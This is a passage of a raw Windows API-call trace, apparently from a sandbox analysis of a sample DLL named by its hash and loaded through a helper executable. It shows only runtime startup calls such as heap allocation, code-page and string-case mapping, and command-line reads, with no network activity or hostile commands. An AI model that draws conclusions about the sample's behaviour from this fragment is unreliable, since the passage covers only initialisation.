¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0077.772] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0077.772] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0077.772] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14f890, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0077.772] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x100) returned 0x5818f0 [0077.772] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7ff626f72300, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe")) returned 0x29 [0077.772] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x17a) returned 0x579aa0 [0077.772] RtlInitializeSListHead (in: ListHead=0x7ff626f72160 | out: ListHead=0x7ff626f72160) [0077.772] GetLastError () returned 0x0 [0077.772] SetLastError (dwErrCode=0x0) [0077.772] GetEnvironmentStringsW () returned 0x584680* [0077.772] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x9cc) returned 0x585060 [0077.772] FreeEnvironmentStringsW (penv=0x584680) returned 1 [0077.772] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x118) returned 0x57a590 [0077.772] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x3e) returned 0x580860 [0077.772] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x5c) returned 0x570780 [0077.772] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x62) returned 0x574c00 [0077.772] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x78) returned 0x57c6f0 [0077.772] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x62) returned 0x575a40 [0077.772] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x28) returned 0x57b770 [0077.773] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x48) returned 0x5801d0 [0077.773] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x1a) returned 0x57b950 [0077.773] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x3a) returned 0x580310 [0077.773] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x62) returned 0x574970 [0077.773] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x2a) returned 0x57c770 [0077.773] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x2e) returned 0x574c70 [0077.773] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x1c) returned 0x57b440 [0077.773] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xd2) returned 0x575cd0 [0077.773] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x7c) returned 0x574000 [0077.773] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x3a) returned 0x580db0 [0077.773] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x90) returned 0x573c20 [0077.773] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x24) returned 0x57b830 [0077.773] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x30) returned 0x5749e0 [0077.773] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x36) returned 0x575ab0 [0077.773] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x3c) returned 0x5808b0 [0077.773] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x52) returned 0x579200 [0077.773] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x3c) returned 0x580c70 [0077.773] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xd6) returned 0x575610 [0077.773] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x2e) returned 0x5720d0 [0077.773] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x1e) returned 0x57b6e0 [0077.773] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x2c) returned 0x572110 [0077.773] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x54) returned 0x5792c0 [0077.773] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x52) returned 0x5790e0 [0077.773] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x24) returned 0x57b980 [0077.773] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x42) returned 0x580770 [0077.773] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x2c) returned 0x572150 [0077.773] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x44) returned 0x580900 [0077.773] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x24) returned 0x57b260 [0077.773] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x585060 | out: hHeap=0x570000) returned 1 [0077.773] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x1000) returned 0x584680 [0077.774] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff626f52580) returned 0x0 [0077.774] GetStartupInfoW (in: lpStartupInfo=0x14fea0 | out: lpStartupInfo=0x14fea0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0077.774] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=DllUnregisterServer" [0077.774] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=DllUnregisterServer", pNumArgs=0x14fe70 | out: pNumArgs=0x14fe70) returned 0x579770*="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" [0077.775] LoadLibraryW (lpLibFileName="C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll") returned 0x7ffc45e90000 [0077.778] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0077.779] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0077.779] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0077.779] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0077.779] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0077.780] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0077.780] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0077.780] GetProcessHeap () returned 0x570000 [0077.780] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0077.780] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0077.780] GetLastError () returned 0x0 [0077.780] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsGetValue") returned 0x7ffc5bfe3780 [0077.781] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0077.781] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x3c8) returned 0x585b10 [0077.781] SetLastError (dwErrCode=0x0) [0077.781] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x1200) returned 0x585ee0 [0077.782] GetStartupInfoW (in: lpStartupInfo=0x14f6f0 | out: lpStartupInfo=0x14f6f0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0077.782] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0077.782] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0077.783] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0077.783] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=DllUnregisterServer" [0077.783] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=DllUnregisterServer" [0077.783] GetACP () returned 0x4e4 [0077.783] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x228) returned 0x57aca0 [0077.783] IsValidCodePage (CodePage=0x4e4) returned 1 [0077.783] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f6b0 | out: lpCPInfo=0x14f6b0) returned 1 [0077.783] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14ef50 | out: lpCPInfo=0x14ef50) returned 1 [0077.783] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0077.783] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14eca0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿp") returned 256 [0077.783] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿp", cchSrc=256, lpCharType=0x14f270 | out: lpCharType=0x14f270) returned 1 [0077.783] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0077.783] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14ec40, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0077.783] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0077.784] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="LCMapStringEx") returned 0x7ffc5bfb5350 [0077.784] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0077.784] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14ea30, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0077.784] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f070, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ0\x0e\x91_ü\x7f", lpUsedDefaultChar=0x0) returned 256 [0077.784] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0077.784] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14ec40, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0077.784] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0077.784] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14ea30, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0077.784] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" 